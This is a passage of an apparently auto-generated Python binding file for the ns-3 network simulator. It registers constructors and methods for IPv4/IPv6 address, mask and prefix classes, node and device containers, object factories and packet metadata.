is_const=True)
return
def register_Ns3Ipv4Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
cls.add_constructor([param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('CombineMask',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv4Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv4Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('GetSubnetDirectedBroadcast',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Address const &', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
cls.add_method('IsLocalMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('IsSubnetDirectedBroadcast',
'bool',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
return
def register_Ns3Ipv4Mask_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
cls.add_constructor([param('uint32_t', 'mask')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
cls.add_constructor([param('char const *', 'mask')])
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
cls.add_method('GetInverse',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint16_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Mask', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'mask')])
return
def register_Ns3Ipv6Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
cls.add_constructor([param('uint8_t *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
cls.add_method('CombinePrefix',
'ns3::Ipv6Address',
[param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv6Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv6Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
cls.add_method('GetAllHostsMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
cls.add_method('GetAllNodesMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
cls.add_method('GetAllRoutersMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function]
cls.add_method('GetIpv4MappedAddress',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
cls.add_method('IsAllHostsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
cls.add_method('IsAllNodesMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
cls.add_method('IsAllRoutersMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
cls.add_method('IsAny',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Address const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() [member function]
cls.add_method('IsIpv4MappedAddress',
'bool',
[])
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
cls.add_method('IsLinkLocal',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function]
cls.add_method('IsLinkLocalMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
cls.add_method('IsLocalhost',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
cls.add_method('IsSolicitedMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function]
cls.add_method('MakeIpv4MappedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv4Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
cls.add_method('MakeSolicitedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv6Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
cls.add_method('Set',
'void',
[param('uint8_t *', 'address')])
return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
cls.add_constructor([param('uint8_t *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
cls.add_constructor([param('char const *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
cls.add_constructor([param('uint8_t', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint8_t',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Prefix const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
return
def register_Ns3NetDeviceContainer_methods(root_module, cls):
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'arg0')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer() [constructor]
cls.add_constructor([])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::Ptr<ns3::NetDevice> dev) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::NetDevice >', 'dev')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(std::string devName) [constructor]
cls.add_constructor([param('std::string', 'devName')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & a, ns3::NetDeviceContainer const & b) [constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'a'), param('ns3::NetDeviceContainer const &', 'b')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::NetDeviceContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NetDeviceContainer', 'other')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(std::string deviceName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'deviceName')])
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::NetDeviceContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True)
## net-device-container.h (module 'network'): uint32_t ns3::NetDeviceContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3NodeContainer_methods(root_module, cls):
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor]
cls.add_constructor([])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor]
cls.add_constructor([param('std::string', 'nodeName')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NodeContainer', 'other')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'nodeName')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n')])
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n'), param('uint32_t', 'systemId')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'i')],
is_const=True)
## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function]
cls.add_method('GetGlobal',
'ns3::NodeContainer',
[],
is_static=True)
## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3ObjectFactory_methods(root_module, cls):
cls.add_output_stream_operator()
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor]
cls.add_constructor([param('std::string', 'typeId')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('ns3::TypeId', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('char const *', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('std::string', 'tid')])
return
def register_Ns3PacketMetadata_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
